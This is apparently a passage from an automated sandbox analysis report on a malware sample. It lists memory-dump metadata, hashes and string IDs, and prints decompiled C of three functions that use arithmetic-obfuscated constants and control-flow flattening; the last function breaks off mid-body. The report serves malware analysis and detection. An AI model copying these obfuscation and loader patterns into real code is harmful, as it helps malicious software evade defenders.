                                                      • Source File: 00000007.00000002.2106829948.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true
                                                      • Associated: 00000007.00000002.2106820868.0000000000230000.00000004.00000001.sdmp
                                                      • Associated: 00000007.00000002.2106848056.000000000024C000.00000004.00000001.sdmp
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: !yG$,$8b$Q$`=6$`=6$j$j$o9$x0$ $X
                                                      • API String ID: 0-3958274775
                                                      • Opcode ID: 151cea3ad7c89dd702ee93776cf97ea4601d4e6957da9cf5090533907b0e08b0
                                                      • Instruction ID: 5f43662d51b6feda9cbbe9d5ae60ba3e4508172afbd750758477588350ad9d1d
                                                      • Opcode Fuzzy Hash: 151cea3ad7c89dd702ee93776cf97ea4601d4e6957da9cf5090533907b0e08b0
                                                      • Instruction Fuzzy Hash: 73A175716183819FD358DF64C48A52BFBE1FBC4358F204A1DF1969A2A0C7B8CA59CF46
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 97%
                                                      			E00243895() {
                                                      				char _v524;
                                                      				signed int _v528;
                                                      				signed int _v532;
                                                      				intOrPtr _v536;
                                                      				signed int _v548;
                                                      				intOrPtr _v552;
                                                      				intOrPtr _v556;
                                                      				intOrPtr _v560;
                                                      				intOrPtr _v564;
                                                      				intOrPtr _v568;
                                                      				intOrPtr _v572;
                                                      				intOrPtr _v576;
                                                      				char _v580;
                                                      				intOrPtr _v584;
                                                      				char _v588;
                                                      				signed int _v592;
                                                      				signed int _v596;
                                                      				signed int _v600;
                                                      				signed int _v604;
                                                      				signed int _v608;
                                                      				signed int _v612;
                                                      				signed int _v616;
                                                      				signed int _v620;
                                                      				signed int _v624;
                                                      				signed int _v628;
                                                      				signed int _v632;
                                                      				signed int _v636;
                                                      				unsigned int _v640;
                                                      				signed int _v644;
                                                      				signed int _v648;
                                                      				signed int _v652;
                                                      				signed int _v656;
                                                      				signed int _v660;
                                                      				signed int _v664;
                                                      				signed int _v668;
                                                      				signed int _v672;
                                                      				signed int _v676;
                                                      				signed int _v680;
                                                      				signed int _v684;
                                                      				signed int _v688;
                                                      				signed int _v692;
                                                      				signed int _v696;
                                                      				signed int _v700;
                                                      				signed int _t281;
                                                      				intOrPtr _t284;
                                                      				void* _t286;
                                                      				void* _t290;
                                                      				void* _t294;
                                                      				void* _t295;
                                                      				char _t297;
                                                      				void* _t303;
                                                      				intOrPtr _t321;
                                                      				signed int _t325;
                                                      				signed int _t326;
                                                      				signed int _t327;
                                                      				signed int _t328;
                                                      				signed int* _t331;
                                                      
                                                      				_t331 =  &_v700;
                                                      				_v532 = _v532 & 0x00000000;
                                                      				_v528 = _v528 & 0x00000000;
                                                      				_t295 = 0x16120aa4;
                                                      				_v536 = 0x65127b;
                                                      				_v664 = 0x3b49;
                                                      				_v664 = _v664 << 5;
                                                      				_v664 = _v664 + 0x6a36;
                                                      				_v664 = _v664 >> 7;
                                                      				_v664 = _v664 ^ 0x00000fa7;
                                                      				_v616 = 0x772f;
                                                      				_v616 = _v616 ^ 0x73b15b69;
                                                      				_v616 = _v616 ^ 0x73b12d46;
                                                      				_v604 = 0xe6c8;
                                                      				_v604 = _v604 + 0x8155;
                                                      				_v604 = _v604 ^ 0x000105e4;
                                                      				_v700 = 0xa5d;
                                                      				_v700 = _v700 * 0x52;
                                                      				_t294 = 0;
                                                      				_v700 = _v700 + 0xffffecf8;
                                                      				_t325 = 0x58;
                                                      				_v700 = _v700 * 0x66;
                                                      				_v700 = _v700 ^ 0x014b32de;
                                                      				_v684 = 0xc8e0;
                                                      				_v684 = _v684 + 0x308b;
                                                      				_v684 = _v684 + 0x2664;
                                                      				_v684 = _v684 >> 6;
                                                      				_v684 = _v684 ^ 0x00006abe;
                                                      				_v676 = 0x796a;
                                                      				_v676 = _v676 + 0xffff196c;
                                                      				_v676 = _v676 + 0xffffd40e;
                                                      				_v676 = _v676 ^ 0xd773f48b;
                                                      				_v676 = _v676 ^ 0x288ceae9;
                                                      				_v612 = 0x157c;
                                                      				_v612 = _v612 << 0x10;
                                                      				_v612 = _v612 ^ 0x157c11c9;
                                                      				_v652 = 0xe7a2;
                                                      				_v652 = _v652 / _t325;
                                                      				_v652 = _v652 | 0x448e2e0d;
                                                      				_v652 = _v652 ^ 0x448e7eb8;
                                                      				_v640 = 0x3ee9;
                                                      				_v640 = _v640 * 0x5d;
                                                      				_v640 = _v640 >> 0xd;
                                                      				_v640 = _v640 ^ 0x0000282d;
                                                      				_v648 = 0xf425;
                                                      				_v648 = _v648 * 9;
                                                      				_v648 = _v648 >> 1;
                                                      				_v648 = _v648 ^ 0x0004354a;
                                                      				_v608 = 0x24ee;
                                                      				_v608 = _v608 + 0x809c;
                                                      				_v608 = _v608 ^ 0x0000fdeb;
                                                      				_v636 = 0x6dae;
                                                      				_v636 = _v636 + 0x1c44;
                                                      				_v636 = _v636 + 0x2b83;
                                                      				_v636 = _v636 ^ 0x0000a12d;
                                                      				_v656 = 0xe590;
                                                      				_v656 = _v656 >> 2;
                                                      				_v656 = _v656 << 7;
                                                      				_v656 = _v656 ^ 0x001cffcc;
                                                      				_v668 = 0xb9db;
                                                      				_v668 = _v668 >> 0xd;
                                                      				_v668 = _v668 + 0x89dd;
                                                      				_v668 = _v668 | 0xbce2fd3c;
                                                      				_v668 = _v668 ^ 0xbce2f9c6;
                                                      				_v596 = 0x1790;
                                                      				_v596 = _v596 + 0xffff27ec;
                                                      				_v596 = _v596 ^ 0xffff59a3;
                                                      				_v672 = 0xffb9;
                                                      				_v672 = _v672 + 0xffff618d;
                                                      				_v672 = _v672 >> 2;
                                                      				_t326 = 0x31;
                                                      				_v672 = _v672 * 0x75;
                                                      				_v672 = _v672 ^ 0x000b38e4;
                                                      				_v644 = 0xc4de;
                                                      				_v644 = _v644 + 0xbfb6;
                                                      				_v644 = _v644 ^ 0xc1434f22;
                                                      				_v644 = _v644 ^ 0xc142a5f5;
                                                      				_v680 = 0x8a5a;
                                                      				_v680 = _v680 | 0x8f6cf4f7;
                                                      				_v680 = _v680 + 0x838e;
                                                      				_v680 = _v680 + 0xffffa8f9;
                                                      				_v680 = _v680 ^ 0x8f6d4033;
                                                      				_v660 = 0xe8e2;
                                                      				_v660 = _v660 / _t326;
                                                      				_t327 = 0x25;
                                                      				_v660 = _v660 * 0x78;
                                                      				_v660 = _v660 ^ 0x000205be;
                                                      				_v688 = 0x9cd0;
                                                      				_v688 = _v688 + 0x8e7d;
                                                      				_v688 = _v688 * 0x26;
                                                      				_v688 = _v688 * 0x51;
                                                      				_v688 = _v688 ^ 0x0e0ecd55;
                                                      				_v620 = 0xe1b5;
                                                      				_v620 = _v620 / _t327;
                                                      				_v620 = _v620 ^ 0x00005557;
                                                      				_v696 = 0x769d;
                                                      				_v696 = _v696 >> 7;
                                                      				_v696 = _v696 | 0x5538ae99;
                                                      				_v696 = _v696 << 2;
                                                      				_v696 = _v696 ^ 0x54e2b31f;
                                                      				_v600 = 0xdcef;
                                                      				_v600 = _v600 << 6;
                                                      				_v600 = _v600 ^ 0x003705ca;
                                                      				_v624 = 0x48eb;
                                                      				_v624 = _v624 >> 0xd;
                                                      				_v624 = _v624 ^ 0x00002379;
                                                      				_v692 = 0xfa2c;
                                                      				_v692 = _v692 | 0x4759ecfd;
                                                      				_v692 = _v692 >> 0xc;
                                                      				_v692 = _v692 >> 9;
                                                      				_v692 = _v692 ^ 0x000062c4;
                                                      				_v632 = 0xbcd9;
                                                      				_v632 = _v632 << 4;
                                                      				_v632 = _v632 | 0x68c1d353;
                                                      				_v632 = _v632 ^ 0x68cbf855;
                                                      				_v628 = 0x848;
                                                      				_t328 = 0x1c;
                                                      				_v628 = _v628 / _t328;
                                                      				_v628 = _v628 ^ 0x00001dd4;
                                                      				_t324 = _v628;
                                                      				_v592 = 0xa720;
                                                      				_v592 = _v592 + 0xffff9569;
                                                      				_v592 = _v592 ^ 0x00003c8a;
                                                      				do {
                                                      					while(_t295 != 0x2b0230e) {
                                                      						if(_t295 == 0x16120aa4) {
                                                      							_t295 = 0x182cddf3;
                                                      							continue;
                                                      						} else {
                                                      							if(_t295 == 0x182cddf3) {
                                                      								E0024AAAE(_v604, _v700, _v684,  &_v588, _v676);
                                                      								_t331 =  &(_t331[3]);
                                                      								_t295 = 0x2f4d7b3a;
                                                      								continue;
                                                      							} else {
                                                      								if(_t295 == 0x1c4d16fa) {
                                                      									_t284 = _v584;
                                                      									_t297 = _v588;
                                                      									_v548 = _v548 & 0x00000000;
                                                      									_v576 = _t284;
                                                      									_v568 = _t284;
                                                      									_v560 = _t284;
                                                      									_v552 = _t284;
                                                      									_v580 = _t297;
                                                      									_v572 = _t297;
                                                      									_v564 = _t297;
                                                      									_v556 = _t297;
                                                      									_t286 = E0023B6DD(_t297, _v600, _t297, _t324, _v624,  &_v580, _v692); // executed
                                                      									_t331 =  &(_t331[5]);
                                                      									__eflags = _t286;
                                                      									_t294 =  !=  ? 1 : _t294;
                                                      									_t295 = 0x2a39a402;
                                                      									continue;
                                                      								} else {
                                                      									if(_t295 == 0x2a39a402) {
                                                      										E00244F7D(_v632, _v628, _t324);
                                                      									} else {
                                                      										if(_t295 == 0x2f4d7b3a) {
                                                      											_v588 = _v588 - E0023F46D();
                                                      											_t295 = 0x369a1b5f;
                                                      											asm("sbb [esp+0x84], edx");
                                                      											continue;
                                                      										} else {
                                                      											_t339 = _t295 - 0x369a1b5f;
                                                      											if(_t295 != 0x369a1b5f) {
                                                      												goto L16;
                                                      											} else {
                                                      												_push(_v652);
                                                      												_t290 = E0024889D(0x24c9b0, _v612, _t339);
                                                      												_pop(_t303);
                                                      												_t321 =  *0x24ca2c; // 0x698300
                                                      												_t224 = _t321 + 0x230; // 0x7a0043
                                                      												E0023C680(_t224, _v648, _v608, _t303, _v636,  *0x24ca2c, _t290,  &_v524);
                                                      												_t331 =  &(_t331[7]);
                                                      												E00242025(_v656, _t290, _v668, _v596);
                                                      												_t295 = 0x2b0230e;
                                                      												continue;
                                                      											}
                                                      										}
                                                      									}
                                                      								}
                                                      							}
                                                      						}
                                                      						L19:
                                                      						return _t294;
                                                      					}
                                                      					_t281 = E0023B566(_t295, _v664, _v672, _v644, _v616, _v680, _t295, _v660, _v688, 0, _v620, _v696, _v592,  &_v524); // executed
                                                      					_t324 = _t281;
                                                      					_t331 =  &(_t331[0xc]);
                                                      					__eflags = _t281 - 0xffffffff;
                                                      					if(__eflags == 0) {
                                                      						_t295 = 0x1d984ba2;
                                                      						goto L16;
                                                      					} else {
                                                      						_t295 = 0x1c4d16fa;
                                                      						continue;
                                                      					}
                                                      					goto L19;
                                                      					L16:
                                                      					__eflags = _t295 - 0x1d984ba2;
                                                      				} while (__eflags != 0);
                                                      				goto L19;
                                                      			}




























































                                                      0x00243c96
                                                      0x00243cb8
                                                      0x00243cc2
                                                      0x00243cc8
                                                      0x00243ccd
                                                      0x00243cde
                                                      0x00243ce5
                                                      0x00000000
                                                      0x00243ce5
                                                      0x00243c7e
                                                      0x00243c76
                                                      0x00243c6a
                                                      0x00243c5e
                                                      0x00243c52
                                                      0x00243e35
                                                      0x00243e3e
                                                      0x00243e3e
                                                      0x00243df7
                                                      0x00243dfc
                                                      0x00243dfe
                                                      0x00243e01
                                                      0x00243e04
                                                      0x00243e10
                                                      0x00000000
                                                      0x00243e06
                                                      0x00243e06
                                                      0x00000000
                                                      0x00243e06
                                                      0x00000000
                                                      0x00243e15
                                                      0x00243e15
                                                      0x00243e15
                                                      0x00000000

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2106829948.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true
                                                      • Associated: 00000007.00000002.2106820868.0000000000230000.00000004.00000001.sdmp
                                                      • Associated: 00000007.00000002.2106848056.000000000024C000.00000004.00000001.sdmp
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CloseHandle
                                                      • String ID: -($/w$6j$:{M/$:{M/$WU$d&$jy$y#$$
                                                      • API String ID: 2962429428-1089002639
                                                      • Opcode ID: b3f48b49e59c2932c5d35d0efdb0a0d1c277be50cc8838aa8ebf4da9b29d3289
                                                      • Instruction ID: 952bdb02c812a16a9a321b22c93aee58147aeeb9372d14efb3e83a78715db55e
                                                      • Opcode Fuzzy Hash: b3f48b49e59c2932c5d35d0efdb0a0d1c277be50cc8838aa8ebf4da9b29d3289
                                                      • Instruction Fuzzy Hash: 0BD101715183819FE368CF25C489A5BFBE1BBC4358F108A1DF1D9862A0D7B98959CF43
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 94%
                                                      			E002442DA(intOrPtr __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                                      				char _v4;
                                                      				char _v8;
                                                      				signed int _v12;
                                                      				intOrPtr _v16;
                                                      				signed int _v20;
                                                      				signed int _v24;
                                                      				signed int _v28;
                                                      				unsigned int _v32;
                                                      				signed int _v36;
                                                      				signed int _v40;
                                                      				signed int _v44;
                                                      				signed int _v48;
                                                      				signed int _v52;
                                                      				signed int _v56;
                                                      				unsigned int _v60;
                                                      				signed int _v64;
                                                      				signed int _v68;
                                                      				signed int _v72;
                                                      				signed int _v76;
                                                      				signed int _v80;
                                                      				signed int _v84;
                                                      				signed int _v88;
                                                      				signed int _v92;
                                                      				unsigned int _v96;
                                                      				signed int _v100;
                                                      				signed int _v104;
                                                      				signed int _v108;
                                                      				signed int _v112;
                                                      				signed int _v116;
                                                      				signed int _v120;
                                                      				signed int _v124;
                                                      				signed int _v128;
                                                      				intOrPtr _v132;
                                                      				signed int _v136;
                                                      				signed int _v140;
                                                      				signed int _v144;
                                                      				intOrPtr _v148;
                                                      				signed int _v152;
                                                      				signed int _v156;
                                                      				signed int _v160;
                                                      				signed int _v164;
                                                      				signed int _v168;
                                                      				signed int _v172;
                                                      				void* _t336;
                                                      				intOrPtr _t357;
                                                      				intOrPtr _t361;
                                                      				void* _t365;
                                                      				signed int _t368;
                                                      				intOrPtr _t379;
                                                      				intOrPtr _t380;
                                                      				void* _t413;
                                                      				signed int _t421;
                                                      				signed int _t422;
                                                      				signed int _t423;
                                                      				signed int _t424;
                                                      				signed int _t425;
                                                      				signed int _t426;
                                                      				signed int _t427;
                                                      				intOrPtr* _t428;
                                                      				signed int _t431;
                                                      				signed int* _t437;
                                                      				void* _t439;
                                                      
                                                      				_t380 = __ecx;
                                                      				_push(_a16);
                                                      				_v148 = __ecx;
                                                      				_push(_a12);
                                                      				_push(_a8);
                                                      				_push(_a4);
                                                      				_push(__edx);
                                                      				_push(__ecx);
                                                      				E0023602B(_t336);
                                                      				_v32 = 0x4bc1;
                                                      				_t437 =  &(( &_v172)[6]);
                                                      				_v32 = _v32 >> 0xf;
                                                      				_v32 = _v32 ^ 0x000002f8;
                                                      				_t379 = 0;
                                                      				_v168 = 0xbc3a;
                                                      				_t431 = 0x3b64c246;
                                                      				_v168 = _v168 >> 0xa;
                                                      				_t435 = 0;
                                                      				_v168 = _v168 << 1;
                                                      				_v168 = _v168 << 9;
                                                      				_v168 = _v168 ^ 0x0000918a;
                                                      				_v96 = 0x296c;
                                                      				_v96 = _v96 ^ 0xfe254c59;
                                                      				_v96 = _v96 >> 0xf;
                                                      				_v96 = _v96 ^ 0x0001a08f;
                                                      				_v52 = 0x7e94;
                                                      				_v52 = _v52 + 0xffff276a;
                                                      				_v52 = _v52 ^ 0xffffb392;
                                                      				_v156 = 0x71e;
                                                      				_v156 = _v156 << 0xa;
                                                      				_v156 = _v156 ^ 0x91e5be42;
                                                      				_v156 = _v156 | 0xf592e812;
                                                      				_v156 = _v156 ^ 0xf5fb9c3d;
                                                      				_v60 = 0xbf5e;
                                                      				_v60 = _v60 >> 7;
                                                      				_v60 = _v60 ^ 0x00001130;
                                                      				_v112 = 0x687f;
                                                      				_v112 = _v112 | 0xf46ca00f;
                                                      				_t421 = 0x35;
                                                      				_v112 = _v112 * 0x78;
                                                      				_v112 = _v112 ^ 0x930cd2b7;
                                                      				_v152 = 0xc857;
                                                      				_v152 = _v152 << 5;
                                                      				_v152 = _v152 | 0x37c6acdc;
                                                      				_v152 = _v152 + 0xffffd100;
                                                      				_v152 = _v152 ^ 0x37df0477;
                                                      				_v144 = 0xf477;
                                                      				_v144 = _v144 >> 2;
                                                      				_v144 = _v144 << 5;
                                                      				_v144 = _v144 | 0xf3531cc7;
                                                      				_v144 = _v144 ^ 0xf357d736;
                                                      				_v120 = 0xcb9;
                                                      				_v120 = _v120 + 0xe3f9;
                                                      				_v120 = _v120 ^ 0x6ced8dd9;
                                                      				_v120 = _v120 ^ 0x6ced4b8c;
                                                      				_v20 = 0x5e2b;
                                                      				_v20 = _v20 + 0xffff1e4f;
                                                      				_v20 = _v20 ^ 0xffff4ba5;
                                                      				_v124 = 0x4b0e;
                                                      				_v124 = _v124 / _t421;
                                                      				_t422 = 0x44;
                                                      				_v124 = _v124 / _t422;
                                                      				_v124 = _v124 ^ 0x00000f50;
                                                      				_v92 = 0x1f74;
                                                      				_v92 = _v92 + 0xffffb151;
                                                      				_v92 = _v92 ^ 0xde981c2c;
                                                      				_v92 = _v92 ^ 0x2167c13f;
                                                      				_v48 = 0x349e;
                                                      				_v48 = _v48 | 0xa536c816;
                                                      				_v48 = _v48 ^ 0xa536ef12;
                                                      				_v172 = 0xab81;
                                                      				_t423 = 0x46;
                                                      				_v172 = _v172 * 0x33;
                                                      				_v172 = _v172 + 0xffff1acb;
                                                      				_v172 = _v172 ^ 0xbb3feb59;
                                                      				_v172 = _v172 ^ 0xbb1e804f;
                                                      				_v72 = 0x6207;
                                                      				_v72 = _v72 + 0xffff8a84;
                                                      				_v72 = _v72 ^ 0xffffdea5;
                                                      				_v80 = 0xb702;
                                                      				_v80 = _v80 * 0x71;
                                                      				_v80 = _v80 + 0xffff1180;
                                                      				_v80 = _v80 ^ 0x004fd1d8;
                                                      				_v40 = 0x81cb;
                                                      				_v40 = _v40 * 0x24;
                                                      				_v40 = _v40 ^ 0x001275f3;
                                                      				_v88 = 0x5eb0;
                                                      				_v88 = _v88 >> 3;
                                                      				_v88 = _v88 + 0x92b4;
                                                      				_v88 = _v88 ^ 0x0000b644;
                                                      				_v160 = 0x12e7;
                                                      				_v160 = _v160 ^ 0x069a79b3;
                                                      				_v160 = _v160 / _t423;
                                                      				_v160 = _v160 << 0xd;
                                                      				_v160 = _v160 ^ 0x04c33b64;
                                                      				_v84 = 0xf1f4;
                                                      				_v84 = _v84 | 0x342cde3b;
                                                      				_t424 = 0x1c;
                                                      				_v84 = _v84 / _t424;
                                                      				_v84 = _v84 ^ 0x01dd3282;
                                                      				_v116 = 0xb146;
                                                      				_t425 = 0x4f;
                                                      				_v116 = _v116 * 0x6c;
                                                      				_v116 = _v116 + 0xbfc7;
                                                      				_v116 = _v116 ^ 0x004bdc24;
                                                      				_v76 = 0x885c;
                                                      				_v76 = _v76 >> 3;
                                                      				_v76 = _v76 ^ 0x00003fd1;
                                                      				_v56 = 0xb3ed;
                                                      				_v56 = _v56 + 0xffff0d01;
                                                      				_v56 = _v56 ^ 0xffffed6a;
                                                      				_v108 = 0xc622;
                                                      				_v108 = _v108 | 0x10712732;
                                                      				_v108 = _v108 ^ 0x74f95923;
                                                      				_v108 = _v108 ^ 0x648892da;
                                                      				_v128 = 0x5bd2;
                                                      				_v128 = _v128 + 0x6edf;
                                                      				_v128 = _v128 >> 2;
                                                      				_v128 = _v128 ^ 0x00004896;
                                                      				_v164 = 0xe1b;
                                                      				_v164 = _v164 / _t425;
                                                      				_v164 = _v164 + 0xf341;
                                                      				_v164 = _v164 >> 0xb;
                                                      				_v164 = _v164 ^ 0x00001a6d;
                                                      				_v104 = 0x25ae;
                                                      				_v104 = _v104 ^ 0xe14689b4;
                                                      				_v104 = _v104 ^ 0x501c8677;
                                                      				_v104 = _v104 ^ 0xb15a3e2e;
                                                      				_v100 = 0xf2b8;
                                                      				_v100 = _v100 >> 4;
                                                      				_v100 = _v100 + 0x7f8b;
                                                      				_v100 = _v100 ^ 0x0000c2a8;
                                                      				_v64 = 0x78fc;
                                                      				_t426 = 0x2a;
                                                      				_v64 = _v64 / _t426;
                                                      				_v64 = _v64 ^ 0x000003c6;
                                                      				_v28 = 0x315;
                                                      				_v28 = _v28 | 0x8467cf1c;
                                                      				_v28 = _v28 ^ 0x84678c6c;
                                                      				_v36 = 0x48e3;
                                                      				_v36 = _v36 << 0x10;
                                                      				_v36 = _v36 ^ 0x48e34564;
                                                      				_v140 = 0xd9da;
                                                      				_v140 = _v140 ^ 0xccfa4b87;
                                                      				_v140 = _v140 >> 8;
                                                      				_v140 = _v140 + 0xb0ba;
                                                      				_v140 = _v140 ^ 0x00cde1b8;
                                                      				_v44 = 0xbd19;
                                                      				_v44 = _v44 >> 0xc;
                                                      				_v44 = _v44 ^ 0x000065c0;
                                                      				_v136 = 0xd203;
                                                      				_v136 = _v136 | 0x5349dfd2;
                                                      				_v136 = _v136 + 0xffffa76d;
                                                      				_v136 = _v136 ^ 0xc21cb162;
                                                      				_v136 = _v136 ^ 0x91553623;
                                                      				_v24 = 0x8da7;
                                                      				_v24 = _v24 + 0xffff55dc;
                                                      				_v24 = _v24 ^ 0xffffe382;
                                                      				_v68 = 0xcfb5;
                                                      				_t427 = 0x28;
                                                      				_v68 = _v68 / _t427;
                                                      				_v68 = _v68 ^ 0x00000530;
                                                      				_t428 = _v12;
                                                      				_t357 = _v132;
                                                      				while(1) {
                                                      					L1:
                                                      					while(1) {
                                                      						_t439 = _t431 - 0x28e290b2;
                                                      						if(_t439 > 0) {
                                                      							goto L18;
                                                      						}
                                                      						L3:
                                                      						if(_t439 == 0) {
                                                      							_t386 = _t379;
                                                      							_t365 = E0024A970(_t379, _v112, _v152, _v144,  &_v4, _v120, _t380, _t380, _a12, _v20, _t380, _v124, _t380,  &_v12, _t380, _t380, _v92);
                                                      							_t437 =  &(_t437[0xf]);
                                                      							if(_t365 == 0) {
                                                      								L24:
                                                      								_t431 = 0x1c1c4d3a;
                                                      								goto L11;
                                                      							} else {
                                                      								_t368 = E00248C8F(_t386);
                                                      								_t431 = 0x30519b83;
                                                      								_t357 = _v12 * 0x2c + _t379;
                                                      								_v132 = _t357;
                                                      								_t428 =  >=  ? _t379 : (_t368 & 0x0000001f) * 0x2c + _t379;
                                                      								goto L12;
                                                      							}
                                                      							L34:
                                                      						} else {
                                                      							if(_t431 == _t413) {
                                                      								E002494DB(_v160, _v84, _t435,  &_v8, _v116, _v136, _v16, _v76);
                                                      								_t431 =  !=  ? 0x33392e52 : 0x221cfa57;
                                                      								_t357 = E00235FB2(_v56, _v108, _v16);
                                                      								_t437 =  &(_t437[8]);
                                                      								L29:
                                                      								_t380 = _v148;
                                                      								_t413 = 0x10c975df;
                                                      								goto L30;
                                                      							} else {
                                                      								if(_t431 == 0x1c1c4d3a) {
                                                      									E0023F536(_v100, _v64, _v28, _t435);
                                                      									_t431 = 0x205a5796;
                                                      									goto L11;
                                                      								} else {
                                                      									if(_t431 == 0x205a5796) {
                                                      										return E0023F536(_v36, _v140, _v44, _t379);
                                                      									}
                                                      									if(_t431 == 0x221cfa57) {
                                                      										_t428 = _t428 + 0x2c;
                                                      										asm("sbb esi, esi");
                                                      										_t431 = (_t431 & 0x14354e49) + 0x1c1c4d3a;
                                                      										continue;
                                                      									} else {
                                                      										if(_t431 != 0x2413af03) {
                                                      											L30:
                                                      											if(_t431 != 0x1b07e5ae) {
                                                      												_t357 = _v132;
                                                      												while(1) {
                                                      													_t439 = _t431 - 0x28e290b2;
                                                      													if(_t439 > 0) {
                                                      														goto L18;
                                                      													}
                                                      													goto L3;
                                                      												}
                                                      												goto L18;
                                                      											}
                                                      										} else {
                                                      											_push(_t380);
                                                      											_push(_t380);
                                                      											_t357 = E00238736(0x20000); // executed
                                                      											_t379 = _t357;
                                                      											if(_t379 != 0) {
                                                      												_t431 = 0x2c9da08a;
                                                      												L11:
                                                      												_t357 = _v132;
                                                      												L12:
                                                      												_t380 = _v148;
                                                      												goto L1;
                                                      											}
                                                      										}
                                                      									}
                                                      								}
                                                      							}
                                                      						}
                                                      						L33:
                                                      						return _t357;
                                                      						goto L34;
                                                      						L18:
                                                      						if(_t431 == 0x2c9da08a) {
                                                      							_push(_t380);
                                                      							_push(_t380);
                                                      							_t357 = E00238736(0x2000);
                                                      							_t435 = _t357;
                                                      							if(_t357 == 0) {
                                                      								_t431 = 0x205a5796;
                                                      								goto L29;
                                                      							} else {
                                                      								_t431 = 0x28e290b2;
                                                      								goto L11;
                                                      							}
                                                      						} else {
                                                      							if(_t431 == 0x30519b83) {
                                                      								_t361 = E0023F65F(_v68, _v72, _v80, _v40,  *_t428, _a12, _v88); // executed
                                                      								_t380 = _v148;
                                                      								_t437 =  &(_t437[5]);
                                                      								_v16 = _t361;
                                                      								_t357 = _v132;
                                                      								_t413 = 0x10c975df;
                                                      								_t431 =  !=  ? 0x10c975df : 0x221cfa57;
                                                      								continue;
                                                      							} else {
                                                      								if(_t431 == 0x33392e52) {
                                                      									E00247830(_v128, _t380, _t435, _v164, _v104, _v24);
                                                      									_t437 =  &(_t437[4]);
                                                      									goto L24;
                                                      								} else {
                                                      									if(_t431 != 0x3b64c246) {
                                                      										goto L30;
                                                      									} else {
                                                      										_t431 = 0x2413af03;
                                                      										continue;
                                                      									}
                                                      								}
                                                      							}
                                                      						}
                                                      						goto L33;
                                                      					}
                                                      				}
                                                      			}

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2106829948.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true
                                                      • Associated: 00000007.00000002.2106820868.0000000000230000.00000004.00000001.sdmp
                                                      • Associated: 00000007.00000002.2106848056.000000000024C000.00000004.00000001.sdmp
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: +^$R.93$R.93$RESCDIR$dEH$l)
                                                      • API String ID: 0-1973027218
                                                      • Opcode ID: 6dae183150793ffe9c3d1d0d0277e954d08126b822ad90e5e8a4cc44d4105b4e
                                                      • Instruction ID: 2915dc4c776e2eeafc5de5578439d751d9c85e9b08d4b9fb612639cca2ca5e31
                                                      • Opcode Fuzzy Hash: 6dae183150793ffe9c3d1d0d0277e954d08126b822ad90e5e8a4cc44d4105b4e
                                                      • Instruction Fuzzy Hash: 980242725187819FE3A8DF24C88AA5BFBE1FBC4314F108A1DE5D996260D7B48949CF43
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 96%
                                                      			E002402C3() {
                                                      				char _v524;
                                                      				intOrPtr _v548;
                                                      				char _v564;
                                                      				intOrPtr _v568;
                                                      				intOrPtr _v572;
                                                      				intOrPtr _v576;
                                                      				intOrPtr _v580;
                                                      				intOrPtr _v584;
                                                      				char _v588;
                                                      				signed int _v592;
                                                      				signed int _v596;
                                                      				signed int _v600;
                                                      				signed int _v604;
                                                      				signed int _v608;
                                                      				signed int _v612;
                                                      				signed int _v616;
                                                      				signed int _v620;
                                                      				signed int _v624;
                                                      				signed int _v628;
                                                      				signed int _v632;
                                                      				signed int _v636;
                                                      				signed int _v640;
                                                      				signed int _v644;
                                                      				signed int _v648;
                                                      				signed int _v652;
                                                      				signed int _v656;
                                                      				signed int _v660;
                                                      				signed int _v664;
                                                      				signed int _v668;
                                                      				signed int _v672;
                                                      				signed int _v676;
                                                      				signed int _t245;
                                                      				signed int _t247;
                                                      				void* _t249;
                                                      				signed int _t254;
                                                      				void* _t255;
                                                      				intOrPtr _t256;
                                                      				signed int _t258;
                                                      				signed int _t259;
                                                      				signed int _t260;
                                                      				signed int _t261;
                                                      				signed int _t262;
                                                      				signed int _t263;
                                                      				signed int _t264;
                                                      				signed int _t265;
                                                      				signed int _t266;
                                                      				signed int _t267;
                                                      				signed int _t290;
                                                      				void* _t293;
                                                      				void* _t298;
                                                      				signed int* _t300;
                                                      
                                                      				_t300 =  &_v676;
                                                      				_v580 = 0x66ae1;
                                                      				_v576 = 0xbd1a2;
                                                      				_v572 = 0x272c23;
                                                      				_t258 = 0x33;
                                                      				_t256 = 0;
                                                      				_t293 = 0x3b419076;
                                                      				_v568 = 0;
                                                      				_v640 = 0x1372;
                                                      				_v640 = _v640 / _t258;
                                                      				_v640 = _v640 | 0x4a3401ed;
                                                      				_v640 = _v640 ^ 0x4a34016d;
                                                      				_v660 = 0x5e98;
                                                      				_v660 = _v660 >> 0xe;
                                                      				_v660 = _v660 | 0x7267fa90;
                                                      				_t259 = 0x75;
                                                      				_v660 = _v660 / _t259;
                                                      				_v660 = _v660 ^ 0x00fa5318;
                                                      				_v652 = 0x5e75;
                                                      				_v652 = _v652 << 0x10;
                                                      				_v652 = _v652 + 0x48dc;
                                                      				_t260 = 0x18;
                                                      				_v652 = _v652 / _t260;
                                                      				_v652 = _v652 ^ 0x03efb4d1;
                                                      				_v608 = 0xe223;
                                                      				_t261 = 0x3f;
                                                      				_v608 = _v608 / _t261;
                                                      				_v608 = _v608 ^ 0x000070cc;
                                                      				_v656 = 0xb48f;
                                                      				_v656 = _v656 >> 6;
                                                      				_t262 = 0x3a;
                                                      				_v656 = _v656 / _t262;
                                                      				_v656 = _v656 + 0xde3a;
                                                      				_v656 = _v656 ^ 0x0000cbaf;
                                                      				_v612 = 0x15cc;
                                                      				_v612 = _v612 ^ 0x9ca6d169;
                                                      				_v612 = _v612 ^ 0x9ca6af9c;
                                                      				_v668 = 0xa8de;
                                                      				_v668 = _v668 << 5;
                                                      				_v668 = _v668 + 0xffff49ed;
                                                      				_t263 = 0x34;
                                                      				_v668 = _v668 / _t263;
                                                      				_v668 = _v668 ^ 0x00000193;
